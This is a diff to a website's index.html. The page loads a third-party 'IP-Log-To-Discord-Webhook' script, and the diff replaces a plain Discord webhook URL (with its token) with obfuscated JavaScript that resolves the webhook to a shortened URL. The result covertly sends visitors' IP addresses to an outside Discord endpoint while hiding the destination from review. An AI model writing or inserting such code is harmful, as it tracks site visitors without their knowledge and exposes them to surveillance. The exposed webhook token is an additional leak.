--- a/index.html
+++ b/index.html
@@ -45,6 +45,6 @@
 
     <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
     <script src="https://cdn.jsdelivr.net/gh/luisoos/IP-Log-To-Discord-Webhook/index.js"></script>
-    <script>var webHookUrl = "https://discord.com/api/webhooks/1261605421211451412/VSwODz5cYH3nvvoDiMcVHFsZX4RoFPFBPWwMk9pRNJgerXwCzfcLatWRh3JtcHmqx8QW";</script>
+    <script>function _0x2998(_0x26510b,_0x5ef7b6){var _0xcefdc2=_0xcefd();return _0x2998=function(_0x299803,_0x5189f9){_0x299803=_0x299803-0xf8;var _0x126128=_0xcefdc2[_0x299803];return _0x126128;},_0x2998(_0x26510b,_0x5ef7b6);}var _0xb39ba0=_0x2998;function _0xcefd(){var _0x58b9db=['92YNXNGL','405270sIvAOt','24LfDeOr','4878888WJQcSV','https://shorturl.at/bXxb2','102715SIlLLQ','1550412uqKVuv','784201ndPmmm','24hopaoa','70lbIRAu','2669876FopQoN','72318eTJdJE'];_0xcefd=function(){return _0x58b9db;};return _0xcefd();}(function(_0xd9cea0,_0x465cfd){var _0x2d22b3=_0x2998,_0x254a9b=_0xd9cea0();while(!![]){try{var _0x34a4aa=parseInt(_0x2d22b3(0x101))/0x1+parseInt(_0x2d22b3(0xf9))/0x2*(-parseInt(_0x2d22b3(0xfc))/0x3)+-parseInt(_0x2d22b3(0xfa))/0x4*(parseInt(_0x2d22b3(0xff))/0x5)+-parseInt(_0x2d22b3(0xfb))/0x6+-parseInt(_0x2d22b3(0xfd))/0x7+-parseInt(_0x2d22b3(0x102))/0x8*(parseInt(_0x2d22b3(0x100))/0x9)+-parseInt(_0x2d22b3(0x103))/0xa*(-parseInt(_0x2d22b3(0xf8))/0xb);if(_0x34a4aa===_0x465cfd)break;else _0x254a9b['push'](_0x254a9b['shift']());}catch(_0x15296a){_0x254a9b['push'](_0x254a9b['shift']());}}}(_0xcefd,0x6b737));var webHookUrl=_0xb39ba0(0xfe);</script>
 </body>
 </html>
